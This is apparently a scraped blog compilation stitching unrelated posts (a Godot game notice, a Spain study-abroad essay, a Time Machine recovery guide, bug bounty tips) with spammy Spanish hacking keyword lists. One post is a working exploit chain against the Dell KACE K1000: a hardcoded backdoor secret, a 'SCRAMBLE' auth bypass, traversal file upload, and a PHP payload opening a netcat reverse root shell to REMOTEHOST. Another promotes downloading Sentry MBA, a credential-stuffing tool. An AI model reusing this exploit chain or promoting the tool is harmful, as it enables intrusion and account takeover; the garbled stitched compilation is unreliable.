SuperStarfighter, A Local Multiplayer Game Made With Godot

Looks like FOSS game development with Godot is a breeze :)

SuperStarfighter is a fast-paced local party game for up to 4 players. Outmaneuver and shoot your opponents in a 2d top-down arena, and become an intergalactic champion!

Get it on Itch.io or find the source code here.

Hat-tip to GoL.

For commenting please visit our forums.

This post was retrieved from freegamer.blogspot.com.

A Fear Of Flying They Call It

Image in Public Domain.

Being the easily impressionable student that I am, I decided to take on the collegiate tradition of studying abroad. It's a common cliche to hear alumni gush about how studying abroad changed their life, and will change yours, too. The salesmen sure know how to pitch, but I can't say I was completely sold.



I study Spanish, by the way. No, it didn't come out of a great passion for the language, or anything noble like that. In my freshman year of high school I had to select two electives. I chose Spanish and Wood Shop, since they seemed to be the easiest grades. Sure enough, they were. I intended to stay for only two years in Spanish, but stayed longer for the fiestas. Yes, I'm sleazy.

A few scholarships later, I found myself at the airport, ready to go. Well, not so ready. My proficiency in Spanish was crap. I'd only taken a cursory glance at the map, so I getting lost was inevitable. My destination was Santander, Spain. A city I'd never heard of before.

The luxurious plane trip did well to calm my nerves. I have always been pensive about flying, having heard the stories of cramped seats, crowded bathrooms, and crappy airplane food. I didn't worry too much about airsickness (since I'm not prone to vomiting), but I grasped my sick bag should Pazuzu suddenly feel the urge to possess me. I expected lifting off to be like riding on a roller coaster (did I forget mention I don't like those?) yet flying through the air hardly felt any different that riding in a car. Better even. My fears about airplanes were assuaged halfway between the in-flight movie and risotto. This was the Blackjack of Setzer Gabbani. Yet, alas, no flight lasts forever.

In the book of Exodus, Moses names his first son with Zipporah, "Gershon", while in exile from Egyptian royalty. In Hebrew, "Gershon" means "stranger in a strange land." In Spain, I thought my name was "Gershon", but in Spain, my name was "mud."

My problems started as soon as I landed in the Madrid airport. The place was a labyrinth and with no David Bowie to guide me, either. After studiously running around in circles for about two and a half hours, I finally found my plane...just about to take off! The flight crew had to stop the departure for me to get on. I scrambled into my seat, sweaty, delirious, and paranoid.

I took a taxi to my host mother's apartment, knowing my habit for getting lost. The Spanish was mostly basic, "Hola", "¿Que tal?", "Estoy bien", etc. I think those cheap formalities would've sufficed, but I overreached my hand and chewed off more than I could swallow. She gave me a slightly confused look. To this day, I wonder what it was that I said. A cat named Rita also lived there. Cats speak the same language in Spain.

I soon had to meet up with my classmates at "Ayuntamiento" which is Spanish for "town hall." I stepped into the streets nervously, my hands jammed into my pockets for fear of thieves. I tried desperately not to look a tourist, but that veneer faded as soon as I brought out my map of the city. I was lost for two hours. A fat lot of good the map did. At the end of my struggle, I gave in and searched out a taxi, but the cab driver nearly laughed me out the vehicle. It turns out that Ayuntamiento was only a few minutes away.

The next day was hardly any better. Classes began at 8:30, so I woke up at 6:00, knowing that there would be a long walk ahead of me. The school was somewhere on the other side of the city, and I had no idea what it looked like. I figured at the time that a university would be easy to spot. Well, you know what they say about assumptions.

The trek was tiring, to say the least. It often had me going uphill through the various neighborhoods and alleyways. I recalled watching The Flash on the plane. How I would've loved to have had Barry Allen's super-speed at the time. Though if I did, I might've missed out on many of the aesthetics. The shops and dwellings of Santander were melded to fit into the rising landscape. Laundry hung on clotheslines outside of the windows, while pigeons scurried on the grounds, pecking for bread crumbs. By the orange hues of sunrise, it all looked at times as if I had wandered into a painting. Though I doubt if a late student would get extra credit for cultural appreciation.

La Universidad de Cantabria was far smaller than I had anticipated, though I suppose that was for the best. If it had been any larger, I'd probably get lost there, too. The university, small though it was, would become something of a second home for me. The think with relish on the countless hours I would spend outside of the cafeteria, listening to quirky stories NPR, memorizing Spanish vocabulary, or eating what was left of my pig liver sandwich.

Perhaps it was the Sea of Cantabria that kept me (relatively) sane throughout all of that initial madness. My host mother had an apartment near the sea, so it sort of functioned as my North Star. I need only know where the sea is, and I'd (eventually) find my way home. It was a great, wide blue that glittered in the sunlight, its waves licking the shore.

I suppose there's something poetic in the sea, though I can't tell you exactly what it is.

Recovering Data From An Old Encrypted Time Machine Backup

Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.

The problem

1. I had an encrypted Time Machine backup which was not used for months
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI

The struggle

By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.

As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.

Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.

YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.

YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.

Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.

The solution

Finally, a blog post provided the real solution - hdiutil.
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.

To mount any NAS via SMB:

mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint>

To mount a Time Capsule share via AFP:

mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint>

And finally this command should do the job:

hdiutil attach test.sparsebundle -readonly

It is nice that you can provide read-only parameter.

If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:

printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly

Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device

And now, you can find your backup disk under /Volumes. Happy restoring!

Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.Related links

1. Como Aprender A Hackear Desde Cero
2. Travel Hacking
3. Best Hacking Books
4. Hacking Tutorials
5. Paginas De Hackers
6. Hacking Curso
7. Growth Hacking Libro
8. Life Hacking

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:

POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;

That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:

http://targethost/service/kbot_upload.php

This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:

    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }

The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksum" check, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  

 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {

Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:

    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 

Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:

    http://targethost/service/tmp/db.php

On our host:

    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:

Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1

That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:

Related links

• Curso De Hacking Etico
• Hacking Software
• Hacking Wifi
• Chema Alonso Wikipedia
• Kali Hacking
• Curso Growth Hacking
• Hacking Cracking
• Libros Hacking
• Como Aprender A Hackear Desde Cero
• Diferencia Entre Hacker Y Cracker

Fragroute

"fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour." read more...

Website: http://monkey.org/~dugsong/fragroute

Related articles

• Curso De Hacking
• Hacking Tor Funciona
• Blackhat Hacking
• Python Hacking
• Aprender A Hackear Desde Cero

How Do I Get Started With Bug Bounty ?

How do I get started with bug bounty hunting? How do I improve my skills?



These are some simple steps that every bug bounty hunter can use to get started and improve their skills:

Learn to make it; then break it!
A major chunk of the hacker's mindset consists of wanting to learn more. In order to really exploit issues and discover further potential vulnerabilities, hackers are encouraged to learn to build what they are targeting. By doing this, there is a greater likelihood that hacker will understand the component being targeted and where most issues appear. For example, when people ask me how to take over a sub-domain, I make sure they understand the Domain Name System (DNS) first and let them set up their own website to play around attempting to "claim" that domain.

Read books. Lots of books.
One way to get better is by reading fellow hunters' and hackers' write-ups. Follow /r/netsec and Twitter for fantastic write-ups ranging from a variety of security-related topics that will not only motivate you but help you improve. For a list of good books to read, please refer to "What books should I read?".

Join discussions and ask questions.
As you may be aware, the information security community is full of interesting discussions ranging from breaches to surveillance, and further. The bug bounty community consists of hunters, security analysts, and platform staff helping one and another get better at what they do. There are two very popular bug bounty forums: Bug Bounty Forum and Bug Bounty World.

Participate in open source projects; learn to code.
Go to https://github.com/explore or https://gitlab.com/explore/projects and pick a project to contribute to. By doing so you will improve your general coding and communication skills. On top of that, read https://learnpythonthehardway.org/ and https://linuxjourney.com/.

Help others. If you can teach it, you have mastered it.
Once you discover something new and believe others would benefit from learning about your discovery, publish a write-up about it. Not only will you help others, you will learn to really master the topic because you can actually explain it properly.

Smile when you get feedback and use it to your advantage.
The bug bounty community is full of people wanting to help others so do not be surprised if someone gives you some constructive feedback about your work. Learn from your mistakes and in doing so use it to your advantage. I have a little physical notebook where I keep track of the little things that I learnt during the day and the feedback that people gave me.


Learn to approach a target.
The first step when approaching a target is always going to be reconnaissance — preliminary gathering of information about the target. If the target is a web application, start by browsing around like a normal user and get to know the website's purpose. Then you can start enumerating endpoints such as sub-domains, ports and web paths.

A woodsman was once asked, "What would you do if you had just five minutes to chop down a tree?" He answered, "I would spend the first two and a half minutes sharpening my axe."
As you progress, you will start to notice patterns and find yourself refining your hunting methodology. You will probably also start automating a lot of the repetitive tasks.

Related articles

1. Ingeniería Social El Arte Del Hacking Personal
2. Google Hacking Search
3. Curso Hacker
4. Hacking Microsoft
5. Tools Hacking
6. Fake Hacking
7. Hacking Desde Cero

DOWNLOAD SENTRY MBA V1.4.1 – AUTOMATED ACCOUNT CRACKING TOOL

Sentry MBA is an automated account cracking tool that makes it one of the most popular cracking tools. It is used by cybercriminals to take over user accounts on major websites. With Sentry MBA, criminals can rapidly test millions of usernames and passwords to see which ones are valid on a targeted website. The tool has become incredibly popular — the Shape Security research team sees Sentry MBA attack attempts on nearly every website we protect.  Download Sentry MBA v1.4.1 latest version.

FEATURES

Sentry MBA has a point-and-click graphical user interface, online help forums, and vibrant underground marketplaces to enable large numbers of individuals to become cybercriminals. These individuals no longer need advanced technical skills, specialized equipment, or insider knowledge to successfully attack major websites.

Sentry MBA attack has three phases,

• Targeting and attack refinement
• Automated account check
• Monetization

Related word

1. Curso Ethical Hacking
2. Como Hacker
3. Libro Hacker
4. Programa De Hacking
5. Hacking Forums